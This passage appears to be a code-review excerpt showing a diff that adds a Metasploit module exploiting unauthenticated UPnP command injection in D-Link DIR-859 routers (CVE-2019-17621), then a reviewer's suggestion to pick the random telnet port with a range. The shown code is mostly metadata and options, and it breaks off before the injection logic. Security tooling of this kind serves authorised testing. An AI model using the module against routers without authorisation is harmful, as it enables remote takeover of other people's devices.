modules/exploits/linux/upnp/dlink_dir859_subscribe_exec_telnet.rb

```diff
@@ -0,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'D-Link DIR-859 Unauthenticated Remote Command Execution',
+      'Description' => %q{
+        D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP
+        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in 
+        /htdocs/cgibin), which is accessible without credentials.
+      },
+      'Author'      =>
+        [
+          'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit
+          'Pablo Pollanco P.' # Vulnerability discovery and metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2019-17621' ],
+          [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]
+        ],
+      'DisclosureDate' => 'Dec 24 2019',
+      'Privileged'     => true,
+      'Platform'       => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Payload'     =>
+        {
+          'Compat'  => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find',
+          },
+        },
+      'DefaultOptions' =>
+        {
+            'PAYLOAD' => 'cmd/unix/interact' ,
+            'RPORT' => '49152'
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic',	{ } ],
+        ],
+      'DefaultTarget'  => 0
+      ))
+
+    register_advanced_options(
+      [
+        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
+        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
+      ])
+  end
+
+  def tel_timeout
+    (datastore['TelnetTimeout'] || 10).to_i
+  end
+
+  def banner_timeout
+    (datastore['TelnetBannerTimeout'] || 25).to_i
+  end
+
+  def exploit
+    telnetport = rand(16384) + 32767
```

Comment:
Using a `range` shows the intention of the code more clearly:

```suggestion
    telnetport = rand(32767..49151)
```